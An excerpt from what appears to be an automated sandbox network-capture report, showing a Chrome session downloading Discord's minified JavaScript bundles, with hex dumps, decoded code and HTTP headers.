                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 49 64 28 29 2c 63 68 61 6e 6e 65 6c 5f 69 64 3a 73 2e 69 64 2c 6d 65 73 73 61 67 65 5f 69 64 3a 6e 75 6c 6c 21 3d 74 3f 74 2e 62 6f 64 79 2e 69 64 3a 6e 75 6c 6c 7d 29 2c 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 29 2c 74 3d 3e 50 72 6f 6d 69 73 65 2e 72 65 6a 65 63 74 28 74 29 29 7d 2c 73 65 6e 64 41 63 74 69 76 69 74 79 49 6e 76 69 74 65 55 73 65 72 28 74 29 7b 6c 65 74 7b 75 73 65 72 49 64 3a 65 2c 74 79 70 65 3a 69 2c 61 63 74 69 76 69 74 79 3a 61 2c 63 6f 6e 74 65 6e 74 3a 6e 2c 6c 6f 63 61 74 69 6f 6e 3a 6c 7d 3d 74 3b 72 65 74 75 72 6e 20 75 2e 64 65 66 61 75 6c 74 2e 65 6e 73 75 72 65 50 72 69 76 61 74 65 43 68 61 6e 6e 65 6c 28 65 29 2e 74 68 65 6e 28 74 3d 3e 74 68 69 73 2e 73 65 6e 64 41 63 74 69 76 69 74 79 49 6e 76 69 74 65 28 7b
                                                                          Data Ascii: Id(),channel_id:s.id,message_id:null!=t?t.body.id:null}),Promise.resolve(s)),t=>Promise.reject(t))},sendActivityInviteUser(t){let{userId:e,type:i,activity:a,content:n,location:l}=t;return u.default.ensurePrivateChannel(e).then(t=>this.sendActivityInvite({
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 74 73 2e 6c 65 6e 67 74 68 3e 33 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 33 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 33 5d 2c 73 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 34 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 34 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 34 5d 3a 5b 5d 3b 69 66 28 75 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 69 3f 50 72 6f 6d 69 73 65 2e 72 65 6a 65 63 74 28 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 63 68 61 6e 6e 65 6c 20 49 44 22 29 29 3a 28 28 30 2c 64 2e 73 74 61 72 74 45 6d 62 65 64 64 65 64 41 63 74 69 76 69 74 79 29 28 69 2c 7b 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 3a 74 7d 2c 73 29 2c 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 29 3b 69 66 28 6f 2e 64 65 66 61 75
                                                                          Data Ascii: ts.length>3&&void 0!==arguments[3]&&arguments[3],s=arguments.length>4&&void 0!==arguments[4]?arguments[4]:[];if(u)return null==i?Promise.reject(Error("Invalid channel ID")):((0,d.startEmbeddedActivity)(i,{application_id:t},s),Promise.resolve());if(o.defau
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 6c 65 74 20 49 3d 45 72 72 6f 72 28 22 67 61 6d 65 20 6e 6f 74 20 66 6f 75 6e 64 22 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 5f 3f 28 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4c 49 42 52 41 52 59 5f 41 50 50 4c 49 43 41 54 49 4f 4e 5f 41 43 54 49 56 45 5f 42 52 41 4e 43 48 5f 55 50 44 41 54 45 22 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 64 3a 74 2c 62 72 61 6e 63 68 49 64 3a 65 7d 29 2c 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 41 4d 45 5f 4c 41 55 4e 43 48 5f 53 54 41 52 54 22 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 64 3a 74 7d 29 2c 5f 2e 74 68 65 6e 28 65 3d 3e 7b 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 41 4d 45 5f 4c 41 55 4e 43 48 5f
                                                                          Data Ascii: let I=Error("game not found");return null!=_?(l.default.dispatch({type:"LIBRARY_APPLICATION_ACTIVE_BRANCH_UPDATE",applicationId:t,branchId:e}),l.default.dispatch({type:"GAME_LAUNCH_START",applicationId:t}),_.then(e=>{l.default.dispatch({type:"GAME_LAUNCH_
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 63 6f 6e 63 61 74 28 74 29 29 29 3b 72 65 74 75 72 6e 7d 69 66 28 6e 75 6c 6c 3d 3d 6e 2e 69 63 6f 6e 7c 7c 22 22 3d 3d 3d 6e 2e 69 63 6f 6e 7c 7c 6e 75 6c 6c 3d 3d 6e 2e 6e 61 6d 65 7c 7c 22 22 3d 3d 3d 6e 2e 6e 61 6d 65 29 7b 61 28 45 72 72 6f 72 28 22 44 69 64 20 6e 6f 74 20 66 69 6e 64 20 64 61 74 61 20 6f 6e 20 22 2e 63 6f 6e 63 61 74 28 74 29 29 29 3b 72 65 74 75 72 6e 7d 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 41 4d 45 5f 49 43 4f 4e 5f 55 50 44 41 54 45 22 2c 67 61 6d 65 4e 61 6d 65 3a 6e 2e 6e 61 6d 65 2c 69 63 6f 6e 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 22 2e 63 6f 6e 63 61 74 28 6e 2e 69 63 6f 6e 29 7d 29 2c 69 28 6e 29 7d 29 7d 29 29 2c 67 65 74 44 65 74 65 63 74 61 62
                                                                          Data Ascii: concat(t)));return}if(null==n.icon||""===n.icon||null==n.name||""===n.name){a(Error("Did not find data on ".concat(t)));return}l.default.dispatch({type:"GAME_ICON_UPDATE",gameName:n.name,icon:"data:image/png;base64,".concat(n.icon)}),i(n)})})),getDetectab
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 7b 6e 2e 64 65 66 61 75 6c 74 2e 70 6f 73 74 28 7b 75 72 6c 3a 43 2e 45 6e 64 70 6f 69 6e 74 73 2e 55 4e 56 45 52 49 46 49 45 44 5f 41 50 50 4c 49 43 41 54 49 4f 4e 53 5f 49 43 4f 4e 53 2c 62 6f 64 79 3a 7b 61 70 70 6c 69 63 61 74 69 6f 6e 5f 6e 61 6d 65 3a 74 2c 61 70 70 6c 69 63 61 74 69 6f 6e 5f 68 61 73 68 3a 65 2c 69 63 6f 6e 3a 69 7d 2c 72 65 74 72 69 65 73 3a 31 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 7d 29 7d 2c 64 65 6c 65 74 65 45 6e 74 72 79 28 74 29 7b 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 52 55 4e 4e 49 4e 47 5f 47 41 4d 45 5f 44 45 4c 45 54 45 5f 45 4e 54 52 59 22 2c 67 61 6d 65 3a 74 7d 29 7d 2c 6c 61 75 6e 63 68 3a 6d 2c 61 73 79 6e 63 20 6a 6f 69 6e 28 74 29 7b 6c 65 74 7b 75 73 65 72 49
                                                                          Data Ascii: {n.default.post({url:C.Endpoints.UNVERIFIED_APPLICATIONS_ICONS,body:{application_name:t,application_hash:e,icon:i},retries:1,oldFormErrors:!0})},deleteEntry(t){l.default.dispatch({type:"RUNNING_GAME_DELETE_ENTRY",game:t})},launch:m,async join(t){let{userI
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 2c 6e 3d 7b 73 68 6f 77 28 74 2c 65 2c 69 2c 6e 2c 6c 29 7b 61 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4e 4f 54 49 43 45 5f 53 48 4f 57 22 2c 6e 6f 74 69 63 65 3a 7b 69 64 3a 6c 2c 74 79 70 65 3a 74 2c 6d 65 73 73 61 67 65 3a 65 2c 62 75 74 74 6f 6e 54 65 78 74 3a 69 2c 63 61 6c 6c 62 61 63 6b 3a 6e 7d 7d 29 7d 2c 64 69 73 6d 69 73 73 28 74 29 7b 61 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4e 4f 54 49 43 45 5f 44 49 53 4d 49 53 53 22 2c 2e 2e 2e 74 7d 29 7d 7d 7d 2c 34 34 37 37 38 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 69 2e 72 28 65 29 2c 69 2e 64 28 65 2c 7b 41 63 74 69 76 69 74 69 65 73 49 6e 47 64 6d 45 78 70 65 72 69 6d 65 6e 74
                                                                          Data Ascii: ,n={show(t,e,i,n,l){a.default.dispatch({type:"NOTICE_SHOW",notice:{id:l,type:t,message:e,buttonText:i,callback:n}})},dismiss(t){a.default.dispatch({type:"NOTICE_DISMISS",...t})}}},447789:function(t,e,i){"use strict";i.r(e),i.d(e,{ActivitiesInGdmExperiment
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 61 74 65 54 65 73 74 4d 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 56 7d 2c 75 70 64 61 74 65 41 63 74 69 76 69 74 79 50 61 6e 65 6c 4d 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 48 7d 2c 75 70 64 61 74 65 46 6f 63 75 73 65 64 41 63 74 69 76 69 74 79 4c 61 79 6f 75 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 59 7d 7d 29 2c 69 28 22 32 32 32 30 30 37 22 29 3b 76 61 72 20 61 3d 69 28 22 37 35 39 38 34 33 22 29 2c 6e 3d 69 28 22 38 37 32 37 31 37 22 29 2c 6c 3d 69 28 22 39 31 33 31 34 34 22 29 2c 64 3d 69 28 22 34 35 30 39 31 31 22 29 2c 72 3d 69 28 22 32 35 35 33 39 37 22 29 2c 75 3d 69 28 22 39 37 30 37 32 38 22 29 2c 63 3d 69 28 22 38 31 39 36 38 39 22 29 2c 6f 3d 69 28 22 35 39 39 34 31 37 22
                                                                          Data Ascii: ateTestMode:function(){return V},updateActivityPanelMode:function(){return H},updateFocusedActivityLayout:function(){return Y}}),i("222007");var a=i("759843"),n=i("872717"),l=i("913144"),d=i("450911"),r=i("255397"),u=i("970728"),c=i("819689"),o=i("599417"
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 65 74 77 6f 72 6b 41 63 74 69 6f 6e 4e 61 6d 65 73 2e 45 4d 42 45 44 44 45 44 5f 41 43 54 49 56 49 54 49 45 53 5f 4c 41 55 4e 43 48 2c 70 72 6f 70 65 72 74 69 65 73 3a 7b 67 75 69 6c 64 5f 69 64 3a 64 2c 63 68 61 6e 6e 65 6c 5f 69 64 3a 74 2c 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 3a 72 2e 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 2c 73 65 73 73 69 6f 6e 5f 69 64 3a 75 7d 7d 2c 72 65 74 72 69 65 73 3a 33 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 7d 29 2c 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 45 4d 42 45 44 44 45 44 5f 41 43 54 49 56 49 54 59 5f 4c 41 55 4e 43 48 5f 53 55 43 43 45 53 53 22 7d 29 7d 63 61 74 63 68 28 65 29 7b 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 45
                                                                          Data Ascii: etworkActionNames.EMBEDDED_ACTIVITIES_LAUNCH,properties:{guild_id:d,channel_id:t,application_id:r.application_id,session_id:u}},retries:3,oldFormErrors:!0}),l.default.dispatch({type:"EMBEDDED_ACTIVITY_LAUNCH_SUCCESS"})}catch(e){l.default.dispatch({type:"E


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          271192.168.2.550007162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:13 UTC866OUTGET /assets/69039.0d3b4d5be7f6a21cf93d.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=PR8tshr9UjVkiwvbW3NuaCUWoy3mYYmajVT_M1hNbwY-1702226713054-0-604800000
                                                                          2023-12-10 16:45:13 UTC969INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 30 39 33 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 30 31 62 66 64 65 64 62 31 35 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:13 GMTContent-Type: application/javascriptContent-Length: 20939Connection: closeCF-Ray: 8336f501bfdedb15-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:13 UTC400INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 36 39 30 33 39 22 5d 2c 7b 37 34 31 31 34 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 66 6f 63 75 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 7d 2c 68 69 64 64 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 2c 72 65 73 69 7a 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 2c 66 75 6c 6c 73 63 72 65 65 6e 43 68 61 6e 67 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 2c 69 6e
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["69039"],{741148:function(e,t,n){"use strict";n.r(t),n.d(t,{focus:function(){return E},hidden:function(){return o},resized:function(){return a},fullscreenChange:function(){return s},in
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 74 63 68 28 7b 74 79 70 65 3a 22 57 49 4e 44 4f 57 5f 46 4f 43 55 53 22 2c 77 69 6e 64 6f 77 49 64 3a 28 30 2c 72 2e 67 65 74 57 69 6e 64 6f 77 49 64 29 28 65 29 2c 66 6f 63 75 73 65 64 3a 74 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 57 49 4e 44 4f 57 5f 48 49 44 44 45 4e 22 2c 77 69 6e 64 6f 77 49 64 3a 28 30 2c 72 2e 67 65 74 57 69 6e 64 6f 77 49 64 29 28 65 29 7d 29 7d 6c 65 74 20 64 3d 28 30 2c 6c 2e 6d 65 6d 6f 69 7a 65 29 28 65 3d 3e 28 30 2c 6c 2e 64 65 62 6f 75 6e 63 65 29 28 28 74 2c 6e 29 3d 3e 7b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 57 49 4e 44 4f 57 5f 52 45 53 49 5a 45 44 22 2c 77 69 6e 64 6f 77 49 64 3a 65 2c 77 69
                                                                          Data Ascii: tch({type:"WINDOW_FOCUS",windowId:(0,r.getWindowId)(e),focused:t})}function o(e){i.default.dispatch({type:"WINDOW_HIDDEN",windowId:(0,r.getWindowId)(e)})}let d=(0,l.memoize)(e=>(0,l.debounce)((t,n)=>{i.default.dispatch({type:"WINDOW_RESIZED",windowId:e,wi
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 2e 2e 65 2e 6d 65 74 61 7d 7d 7d 7d 2c 35 30 35 35 30 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6c 65 74 20 6c 2c 69 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 7d 7d 29 2c 6e 28 22 34 32 34 39 37 33 22 29 2c 6e 28 22 32 32 32 30 30 37 22 29 2c 6e 28 22 37 30 31 30 32 22 29 2c 6e 28 22 38 30 38 36 35 33 22 29 3b 76 61 72 20 75 2c 72 2c 45 3d 6e 28 22 39 31 37 33 35 31 22 29 2c 6f 3d 6e 2e 6e 28 45 29 2c 64 3d 6e 28 22 37 34 38 38 32 30 22 29 2c 61 3d 6e 28 22 34 34 36 36 37 34 22 29 2c 73 3d 6e 28 22 39 35 34 31 30 22 29 2c 5f 3d 6e 28 22 39 31 33 31 34 34 22 29 2c 41 3d 6e 28 22 36 38 34 38 34 39 22 29 2c 63 3d 6e 28 22 36
                                                                          Data Ascii: ..e.meta}}}},505507:function(e,t,n){"use strict";let l,i;n.r(t),n.d(t,{default:function(){return g}}),n("424973"),n("222007"),n("70102"),n("808653");var u,r,E=n("917351"),o=n.n(E),d=n("748820"),a=n("446674"),s=n("95410"),_=n("913144"),A=n("684849"),c=n("6
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 7b 77 69 64 74 68 3a 32 37 32 2c 68 65 69 67 68 74 3a 31 30 30 7d 2c 72 65 73 69 7a 65 58 3a 21 31 2c 72 65 73 69 7a 65 59 3a 21 31 2c 64 72 61 67 41 6e 79 77 68 65 72 65 3a 21 30 2c 6c 61 79 6f 75 74 50 6f 6c 69 63 79 3a 22 52 45 51 55 49 52 45 44 22 2c 64 65 66 61 75 6c 74 53 65 74 74 69 6e 67 73 3a 7b 61 6e 63 68 6f 72 3a 7b 6c 65 66 74 3a 6e 75 6c 6c 2c 74 6f 70 3a 2e 30 31 31 2c 62 6f 74 74 6f 6d 3a 6e 75 6c 6c 2c 72 69 67 68 74 3a 2e 30 31 31 7d 2c 73 69 7a 65 3a 7b 77 69 64 74 68 3a 22 61 75 74 6f 22 2c 68 65 69 67 68 74 3a 22 61 75 74 6f 22 7d 2c 70 69 6e 6e 65 64 3a 21 30 7d 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 69 5b 65 5d 3b 69 66 28 6e 75 6c 6c 3d 3d 6e 29 72 65 74 75 72 6e 21 31 3b 6c 65 74 20 75 3d 6c 5b
                                                                          Data Ascii: {width:272,height:100},resizeX:!1,resizeY:!1,dragAnywhere:!0,layoutPolicy:"REQUIRED",defaultSettings:{anchor:{left:null,top:.011,bottom:null,right:.011},size:{width:"auto",height:"auto"},pinned:!0}}};function h(e,t){let n=i[e];if(null==n)return!1;let u=l[
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 74 28 65 29 7b 6c 65 74 20 74 3d 74 68 69 73 2e 67 65 74 4c 61 79 6f 75 74 28 65 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 5b 5d 3a 74 2e 77 69 64 67 65 74 73 2e 72 65 64 75 63 65 28 28 65 2c 74 29 3d 3e 7b 6c 65 74 20 6e 3d 74 68 69 73 2e 67 65 74 57 69 64 67 65 74 28 74 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 6e 26 26 65 2e 70 75 73 68 28 6e 29 2c 65 7d 2c 5b 5d 29 7d 67 65 74 57 69 64 67 65 74 43 6f 6e 66 69 67 28 65 29 7b 72 65 74 75 72 6e 20 54 5b 65 5d 7d 67 65 74 57 69 64 67 65 74 44 65 66 61 75 6c 74 53 65 74 74 69 6e 67 73 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 65 29 7d 67 65 74 57 69 64 67 65 74 54 79 70 65 28 65 29 7b 6c 65 74 20 74 3d 69 5b 65 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 3f 74 2e 74 79 70 65 3a 22 22 7d 67 65
                                                                          Data Ascii: t(e){let t=this.getLayout(e);return null==t?[]:t.widgets.reduce((e,t)=>{let n=this.getWidget(t);return null!=n&&e.push(n),e},[])}getWidgetConfig(e){return T[e]}getWidgetDefaultSettings(e){return L(e)}getWidgetType(e){let t=i[e];return null!=t?t.type:""}ge
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 76 65 72 6c 61 79 57 69 64 67 65 74 73 2e 54 45 58 54 26 26 28 6c 3d 6e 5b 31 5d 2e 70 69 6e 6e 65 64 29 2c 6e 75 6c 6c 21 3d 6c 26 26 6e 75 6c 6c 21 3d 75 7c 7c 76 6f 69 64 20 30 29 7d 29 2c 6c 7c 7c 6e 75 6c 6c 3d 3d 75 29 72 65 74 75 72 6e 3b 6c 65 74 20 72 3d 28 30 2c 64 2e 76 34 29 28 29 3b 6e 2e 77 69 64 67 65 74 73 3d 5b 75 2c 72 5d 2c 69 2e 70 75 73 68 28 5b 72 2c 7b 2e 2e 2e 4c 28 66 2e 4f 76 65 72 6c 61 79 57 69 64 67 65 74 73 2e 47 55 49 4c 44 53 5f 54 45 58 54 29 2c 74 79 70 65 3a 66 2e 4f 76 65 72 6c 61 79 57 69 64 67 65 74 73 2e 47 55 49 4c 44 53 5f 54 45 58 54 2c 69 64 3a 72 2c 6c 61 79 6f 75 74 49 64 3a 74 2c 7a 49 6e 64 65 78 3a 32 7d 5d 29 7d 29 2c 7b 77 69 64 67 65 74 73 3a 69 2c 6c 61 79 6f 75 74 73 3a 75 7d 7d 2c 65 3d 3e 7b 6c 65 74
                                                                          Data Ascii: verlayWidgets.TEXT&&(l=n[1].pinned),null!=l&&null!=u||void 0)}),l||null==u)return;let r=(0,d.v4)();n.widgets=[u,r],i.push([r,{...L(f.OverlayWidgets.GUILDS_TEXT),type:f.OverlayWidgets.GUILDS_TEXT,id:r,layoutId:t,zIndex:2}])}),{widgets:i,layouts:u}},e=>{let
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 5b 5d 3b 72 65 74 75 72 6e 20 65 2e 77 69 64 67 65 74 73 2e 66 6f 72 45 61 63 68 28 65 3d 3e 7b 6c 65 74 20 6e 3d 69 5b 65 5d 3b 6e 75 6c 6c 21 3d 6e 26 26 74 2e 70 75 73 68 28 6e 29 7d 29 2c 74 7d 28 65 29 3b 6e 2e 73 6f 72 74 28 28 65 2c 74 29 3d 3e 65 2e 7a 49 6e 64 65 78 2d 74 2e 7a 49 6e 64 65 78 29 3b 6c 65 74 20 6c 3d 6e 2e 66 69 6e 64 49 6e 64 65 78 28 65 3d 3e 65 2e 69 64 3d 3d 3d 74 29 3b 69 66 28 6c 3d 3d 3d 6e 2e 6c 65 6e 67 74 68 2d 31 29 72 65 74 75 72 6e 21 31 3b 6e 2e 70 75 73 68 28 6e 2e 73 70 6c 69 63 65 28 6c 2c 31 29 5b 30 5d 29 3b 66 6f 72 28 6c 65 74 20 65 3d 30 3b 65 3c 6e 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 7b 6c 65 74 20 74 3d
                                                                          Data Ascii: ction(e,t){let n=function(e){let t=[];return e.widgets.forEach(e=>{let n=i[e];null!=n&&t.push(n)}),t}(e);n.sort((e,t)=>e.zIndex-t.zIndex);let l=n.findIndex(e=>e.id===t);if(l===n.length-1)return!1;n.push(n.splice(l,1)[0]);for(let e=0;e<n.length;e++){let t=
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 37 39 31 22 29 3b 6c 65 74 20 53 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 73 65 6c 65 63 74 65 64 47 75 69 6c 64 49 64 3a 6e 75 6c 6c 2c 73 65 6c 65 63 74 65 64 43 68 61 6e 6e 65 6c 49 64 3a 6e 75 6c 6c 2c 64 69 73 70 6c 61 79 55 73 65 72 4d 6f 64 65 3a 68 2e 4f 76 65 72 6c 61 79 44 69 73 70 6c 61 79 55 73 65 72 73 2e 41 4c 57 41 59 53 2c 64 69 73 70 6c 61 79 4e 61 6d 65 4d 6f 64 65 3a 68 2e 4f 76 65 72 6c 61 79 44 69 73 70 6c 61 79 4e 61 6d 65 73 2e 41 4c 57 41 59 53 2c 61 76 61 74 61 72 53 69 7a 65 4d 6f 64 65 3a 68 2e 4f 76 65 72 6c 61 79 41 76 61 74 61 72 53 69 7a 65 73 2e 4c 41 52 47 45 2c 6e 6f 74 69 66 69 63 61 74 69 6f 6e 50 6f 73 69 74 69 6f 6e 4d 6f 64 65 3a 68 2e 4f 76 65 72 6c 61 79 4e 6f 74 69 66 69 63 61 74 69 6f 6e 50 6f 73 69 74 69
                                                                          Data Ascii: 791");let S=Object.freeze({selectedGuildId:null,selectedChannelId:null,displayUserMode:h.OverlayDisplayUsers.ALWAYS,displayNameMode:h.OverlayDisplayNames.ALWAYS,avatarSizeMode:h.OverlayAvatarSizes.LARGE,notificationPositionMode:h.OverlayNotificationPositi
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 54 5f 47 4f 5f 4c 49 56 45 5f 53 4f 55 52 43 45 22 2c 22 4f 56 45 52 4c 41 59 5f 41 43 54 49 56 41 54 45 5f 52 45 47 49 4f 4e 22 2c 22 4f 56 45 52 4c 41 59 5f 44 45 41 43 54 49 56 41 54 45 5f 41 4c 4c 5f 52 45 47 49 4f 4e 53 22 2c 22 4f 56 45 52 4c 41 59 5f 4d 45 53 53 41 47 45 5f 45 56 45 4e 54 5f 41 43 54 49 4f 4e 22 2c 22 4f 56 45 52 4c 41 59 5f 53 45 54 5f 41 56 41 54 41 52 5f 53 49 5a 45 5f 4d 4f 44 45 22 2c 22 4f 56 45 52 4c 41 59 5f 53 45 54 5f 43 4c 49 43 4b 5f 5a 4f 4e 45 53 22 2c 22 4f 56 45 52 4c 41 59 5f 53 45 54 5f 44 49 53 50 4c 41 59 5f 4e 41 4d 45 5f 4d 4f 44 45 22 2c 22 4f 56 45 52 4c 41 59 5f 53 45 54 5f 44 49 53 50 4c 41 59 5f 55 53 45 52 5f 4d 4f 44 45 22 2c 22 4f 56 45 52 4c 41 59 5f 53 45 54 5f 49 4e 50 55 54 5f 4c 4f 43 4b 45 44 22
                                                                          Data Ascii: T_GO_LIVE_SOURCE","OVERLAY_ACTIVATE_REGION","OVERLAY_DEACTIVATE_ALL_REGIONS","OVERLAY_MESSAGE_EVENT_ACTION","OVERLAY_SET_AVATAR_SIZE_MODE","OVERLAY_SET_CLICK_ZONES","OVERLAY_SET_DISPLAY_NAME_MODE","OVERLAY_SET_DISPLAY_USER_MODE","OVERLAY_SET_INPUT_LOCKED"


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          272192.168.2.550006162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:13 UTC866OUTGET /assets/99742.217a8e519977f9b5cbf0.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
